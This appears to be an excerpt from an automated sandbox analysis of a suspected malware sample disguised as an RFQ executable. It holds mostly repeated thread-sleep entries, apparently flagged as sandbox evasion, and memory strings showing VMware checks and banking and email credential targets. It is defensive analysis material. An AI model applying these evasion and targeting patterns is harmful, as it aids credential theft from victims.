Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -598994s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -598875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -598765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -598656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8148	Thread sleep count: 5978 > 30	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -598547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -598437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -598328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -598219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -598094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -597984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -597875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -597766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -597547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -597437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -597328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -597219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -597109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -597000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -596890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -596781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -596438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -596279s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -596020s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -595891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -595781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -595672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -595562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -595453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -595344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -595125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -595015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -594906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -594797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -594688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -594578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -594469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -594359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -594250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -594141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -594031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -593922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -593813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -593688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -593563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -593438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -593328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -593219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 8060	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep count: 33 > 30
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -599891s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 2056	Thread sleep count: 7288 > 30
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 2056	Thread sleep count: 2557 > 30
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -599763s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -599590s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -599156s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -598878s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -598696s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -598594s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -598483s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -598375s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -598264s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -598155s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -598045s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -597937s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -597828s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -597717s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -597609s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -597500s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -597391s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -597281s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -597172s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -597062s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -596953s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -596844s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -596734s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -596625s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -596516s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -596406s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -596297s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -596188s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -596078s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -595967s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -595859s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -595750s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -595640s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -595531s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -595422s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -595312s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -595203s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -595094s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -594984s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -594875s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -594765s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -594656s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -594538s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -594438s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -594328s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -594219s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -594109s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -593999s >= -30000s
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828	Thread sleep time: -593891s >= -30000s

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 599158	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 598994	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 596438	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 596279	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 596020	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 595891	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 594250	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 594141	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 594031	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 593922	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 593813	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 593688	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 593563	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 593438	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 593328	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 593219	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 599763
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 599590
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 599156
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 598878
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 598696
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 598594
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 598483
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 598375
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 598264
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 598155
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 598045
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 597937
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 597828
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 597717
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 597609
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 597500
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 597391
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 597281
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 597172
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 597062
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 596953
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 596844
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 596734
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 596625
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 596516
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 596406
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 596297
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 596188
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 596078
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 595967
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 595859
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 595750
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 595640
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 595531
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 595422
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 595312
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 595203
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 595094
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 594984
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 594875
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 594765
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 594656
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 594538
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 594438
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 594328
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 594219
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 594109
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 593999
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 593891

Source: nDEusQ.exe, 0000000A.00000002.1658607131.0000000005B8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:^
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: nDEusQ.exe, 0000000E.00000002.2806233102.00000000042BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
